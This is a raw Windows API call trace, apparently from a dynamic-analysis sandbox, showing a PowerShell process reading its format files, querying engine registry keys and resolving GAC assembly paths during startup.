	[0162.883] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x468dfd47, Data2=0x8fa9, Data3=0x4e9f, Data4=([0]=0xb9, [1]=0x89, [2]=0xb1, [3]=0x42, [4]=0xcc, [5]=0xd3, [6]=0xe5, [7]=0x63))) returned 0x0
	[0162.883] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x70a57e32, Data2=0x713d, Data3=0x4400, Data4=([0]=0x96, [1]=0xca, [2]=0x9c, [3]=0xc2, [4]=0x63, [5]=0xb9, [6]=0x2e, [7]=0xc5))) returned 0x0
	[0162.883] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xdf2e530d, Data2=0x9437, Data3=0x44ad, Data4=([0]=0xa1, [1]=0xc1, [2]=0x73, [3]=0xbe, [4]=0x64, [5]=0xaf, [6]=0x59, [7]=0xff))) returned 0x0
	[0162.883] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.884] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xa830b175, Data2=0xd893, Data3=0x4997, Data4=([0]=0x93, [1]=0x1a, [2]=0x4e, [3]=0xb1, [4]=0x34, [5]=0xde, [6]=0xb8, [7]=0x20))) returned 0x0
	[0162.884] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x52344af9, Data2=0x23fc, Data3=0x4088, Data4=([0]=0xbb, [1]=0xd5, [2]=0x2d, [3]=0xaa, [4]=0xbf, [5]=0x7, [6]=0xef, [7]=0x80))) returned 0x0
	[0162.884] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x6841bfc0, Data2=0x229e, Data3=0x44e6, Data4=([0]=0x93, [1]=0x8, [2]=0x23, [3]=0xb3, [4]=0x3e, [5]=0x39, [6]=0xd3, [7]=0x45))) returned 0x0
	[0162.884] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x883452ae, Data2=0xf52a, Data3=0x4343, Data4=([0]=0xad, [1]=0xec, [2]=0xd9, [3]=0xf9, [4]=0x8e, [5]=0xd3, [6]=0x51, [7]=0x3f))) returned 0x0
	[0162.884] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x373ba748, Data2=0xd8a6, Data3=0x447a, Data4=([0]=0xa6, [1]=0xf3, [2]=0xe7, [3]=0x39, [4]=0x76, [5]=0x22, [6]=0xce, [7]=0xed))) returned 0x0
	[0162.884] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.885] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x4cfc21a5, Data2=0x75bd, Data3=0x4f4a, Data4=([0]=0xb9, [1]=0x68, [2]=0x10, [3]=0x29, [4]=0xe5, [5]=0xfc, [6]=0x3d, [7]=0x5b))) returned 0x0
	[0162.885] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xb4c0b7d1, Data2=0xd446, Data3=0x4049, Data4=([0]=0x82, [1]=0x51, [2]=0x76, [3]=0x5e, [4]=0x35, [5]=0xa7, [6]=0xc7, [7]=0x88))) returned 0x0
	[0162.885] VirtualQuery (in: lpAddress=0x14d0a8, lpBuffer=0x14e0a8, dwLength=0x1c | out: lpBuffer=0x14e0a8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.885] VirtualQuery (in: lpAddress=0x14d0a8, lpBuffer=0x14e0a8, dwLength=0x1c | out: lpBuffer=0x14e0a8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.885] VirtualQuery (in: lpAddress=0x14d0a8, lpBuffer=0x14e0a8, dwLength=0x1c | out: lpBuffer=0x14e0a8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.885] VirtualQuery (in: lpAddress=0x14d0a8, lpBuffer=0x14e0a8, dwLength=0x1c | out: lpBuffer=0x14e0a8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ddec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0162.885] GetLastError () returned 0x0
	[0162.885] SetErrorMode (uMode=0x1) returned 0x1
	[0162.886] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0162.886] GetLastError () returned 0x0
	[0162.886] GetFileType (hFile=0x34c) returned 0x1
	[0162.886] SetErrorMode (uMode=0x1) returned 0x1
	[0162.886] GetFileType (hFile=0x34c) returned 0x1
	[0162.886] ReadFile (in: hFile=0x34c, lpBuffer=0x2bc81d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2bc81d8*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0162.946] GetLastError () returned 0x0
	[0162.946] ReadFile (in: hFile=0x34c, lpBuffer=0x2bc81d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2bc81d8*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0163.147] GetLastError () returned 0x0
	[0163.147] ReadFile (in: hFile=0x34c, lpBuffer=0x2bc81d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2bc81d8*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0163.286] GetLastError () returned 0x0
	[0163.286] ReadFile (in: hFile=0x34c, lpBuffer=0x2bc81d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2bc81d8*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0163.427] GetLastError () returned 0x0
	[0163.427] ReadFile (in: hFile=0x34c, lpBuffer=0x2bc81d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2bc81d8*, lpNumberOfBytesRead=0x14e354*=0x8b4, lpOverlapped=0x0) returned 1
	[0163.427] GetLastError () returned 0x0
	[0163.427] ReadFile (in: hFile=0x34c, lpBuffer=0x2bc762c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2bc762c*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0163.427] GetLastError () returned 0x0
	[0163.427] ReadFile (in: hFile=0x34c, lpBuffer=0x2bc81d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2bc81d8*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0163.427] GetLastError () returned 0x0
	[0163.428] CloseHandle (hObject=0x34c) returned 1
	[0163.428] GetLastError () returned 0x0
	[0163.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0163.428] GetLastError () returned 0x0
	[0163.428] SetErrorMode (uMode=0x1) returned 0x1
	[0163.428] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2be91d4 | out: lpFileInformation=0x2be91d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0163.428] GetLastError () returned 0x0
	[0163.428] SetErrorMode (uMode=0x1) returned 0x1
	[0163.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0163.428] GetLastError () returned 0x0
	[0163.429] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e2d8 | out: phkResult=0x14e2d8*=0x34c) returned 0x0
	[0163.429] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x0, lpcbData=0x14e31c*=0x0 | out: lpType=0x14e320*=0x1, lpData=0x0, lpcbData=0x14e31c*=0x56) returned 0x0
	[0163.429] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x721bd8, lpcbData=0x14e31c*=0x56 | out: lpType=0x14e320*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e31c*=0x56) returned 0x0
	[0163.429] RegCloseKey (hKey=0x34c) returned 0x0
	[0163.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0163.429] GetLastError () returned 0x0
	[0163.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0163.429] GetLastError () returned 0x0
	[0163.430] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xb38eedbb, Data2=0x283c, Data3=0x4d7b, Data4=([0]=0xa9, [1]=0xec, [2]=0x75, [3]=0x88, [4]=0x9c, [5]=0x5a, [6]=0x15, [7]=0x9b))) returned 0x0
	[0163.430] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xb599f12b, Data2=0x6b8d, Data3=0x4b2c, Data4=([0]=0x86, [1]=0xdd, [2]=0x61, [3]=0x5e, [4]=0x65, [5]=0xbf, [6]=0xb5, [7]=0xca))) returned 0x0
	[0163.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ddec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0163.430] GetLastError () returned 0x0
	[0163.430] SetErrorMode (uMode=0x1) returned 0x1
	[0163.430] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0163.430] GetLastError () returned 0x0
	[0163.430] GetFileType (hFile=0x34c) returned 0x1
	[0163.431] SetErrorMode (uMode=0x1) returned 0x1
	[0163.431] GetFileType (hFile=0x34c) returned 0x1
	[0163.431] ReadFile (in: hFile=0x34c, lpBuffer=0x2bff0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2bff0e4*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0163.438] GetLastError () returned 0x0
	[0163.438] ReadFile (in: hFile=0x34c, lpBuffer=0x2bff0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2bff0e4*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0163.444] GetLastError () returned 0x0
	[0163.444] ReadFile (in: hFile=0x34c, lpBuffer=0x2bff0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2bff0e4*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0163.444] GetLastError () returned 0x0
	[0163.444] ReadFile (in: hFile=0x34c, lpBuffer=0x2bff0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2bff0e4*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0163.444] GetLastError () returned 0x0
	[0163.444] ReadFile (in: hFile=0x34c, lpBuffer=0x2bff0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2bff0e4*, lpNumberOfBytesRead=0x14e354*=0xe98, lpOverlapped=0x0) returned 1
	[0163.444] GetLastError () returned 0x0
	[0163.444] ReadFile (in: hFile=0x34c, lpBuffer=0x2bfe71c, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2bfe71c*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0163.444] GetLastError () returned 0x0
	[0163.444] ReadFile (in: hFile=0x34c, lpBuffer=0x2bff0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2bff0e4*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0163.445] GetLastError () returned 0x0
	[0163.445] CloseHandle (hObject=0x34c) returned 1
	[0163.708] GetLastError () returned 0x0
	[0163.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0163.708] GetLastError () returned 0x0
	[0163.708] SetErrorMode (uMode=0x1) returned 0x1
	[0163.708] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2c200e0 | out: lpFileInformation=0x2c200e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0164.066] GetLastError () returned 0x0
	[0164.066] SetErrorMode (uMode=0x1) returned 0x1
	[0164.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0164.066] GetLastError () returned 0x0
	[0164.066] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e2d8 | out: phkResult=0x14e2d8*=0x34c) returned 0x0
	[0164.066] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x0, lpcbData=0x14e31c*=0x0 | out: lpType=0x14e320*=0x1, lpData=0x0, lpcbData=0x14e31c*=0x56) returned 0x0
	[0164.067] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x721bd8, lpcbData=0x14e31c*=0x56 | out: lpType=0x14e320*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e31c*=0x56) returned 0x0
	[0164.067] RegCloseKey (hKey=0x34c) returned 0x0
	[0164.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0164.067] GetLastError () returned 0x0
	[0164.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0164.067] GetLastError () returned 0x0
	[0164.067] VirtualQuery (in: lpAddress=0x14d030, lpBuffer=0x14e030, dwLength=0x1c | out: lpBuffer=0x14e030*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0164.067] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x663f2bf7, Data2=0x14e8, Data3=0x4268, Data4=([0]=0xb2, [1]=0xbe, [2]=0xa1, [3]=0x2f, [4]=0x51, [5]=0xf, [6]=0xd8, [7]=0xa2))) returned 0x0
	[0164.068] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x48391e81, Data2=0x9329, Data3=0x4de3, Data4=([0]=0x86, [1]=0xef, [2]=0xba, [3]=0x55, [4]=0x97, [5]=0x1f, [6]=0x2a, [7]=0x4))) returned 0x0
	[0164.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0164.332] GetLastError () returned 0x57
	[0164.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0164.333] GetLastError () returned 0x57
	[0164.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0164.354] GetLastError () returned 0x57
	[0164.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0164.354] GetLastError () returned 0x57
	[0164.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0164.359] GetLastError () returned 0x57
	[0164.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0164.359] GetLastError () returned 0x57
	[0164.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0164.361] GetLastError () returned 0x57
	[0164.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0164.361] GetLastError () returned 0x57
	[0164.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0164.364] GetLastError () returned 0x57
	[0164.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0164.364] GetLastError () returned 0x57
	[0164.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0164.366] GetLastError () returned 0x57
	[0164.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0164.366] GetLastError () returned 0x57
	[0164.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0164.368] GetLastError () returned 0x57
	[0164.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0164.368] GetLastError () returned 0x57
	[0164.569] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0164.570] GetLastError () returned 0xcb
	[0164.570] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0164.570] GetLastError () returned 0xcb
	[0164.571] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0164.571] GetLastError () returned 0xcb
	[0164.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0164.572] GetLastError () returned 0xcb
	[0164.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0164.575] GetLastError () returned 0xcb
	[0164.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0164.576] GetLastError () returned 0xcb
	[0164.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0164.577] GetLastError () returned 0xcb
	[0164.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e3cc | out: phkResult=0x14e3cc*=0x34c) returned 0x0
